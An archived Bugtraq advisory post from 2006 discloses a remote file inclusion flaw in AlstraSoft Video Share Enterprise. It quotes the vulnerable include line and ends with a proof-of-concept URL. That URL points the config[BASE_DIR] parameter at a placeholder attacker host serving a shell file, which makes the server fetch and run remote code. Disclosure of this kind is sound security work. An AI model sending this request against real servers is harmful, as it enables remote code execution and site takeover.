[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
AlstraSoft Video Share Enterprise Remote File Include Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: AlstraSoft Video Share Enterprise Remote File Include Vulnerability
- From: night_warrior-@xxxxxxxxxxx
- Date: 26 Aug 2006 09:48:59 -0000
##Night_Warrior<Kurdish Hacker>
##night_warrior-[at]hotmail.com
##AlstraSoft Video Share Enterprise Remote File Include Vulnerability
##Contact : night_warrior-[at]hotmail.com
##hompage : www.alstrasoft.com
##vuln code :
myajaxphp.php line 11
require_once($config['BASE_DIR'] . "/ajax/cpaint2.inc.php");
http://www.example.com/[Script
Path]/ajax/myajaxphp.php?config[BASE_DIR]=http://atacker.com/shell.txt?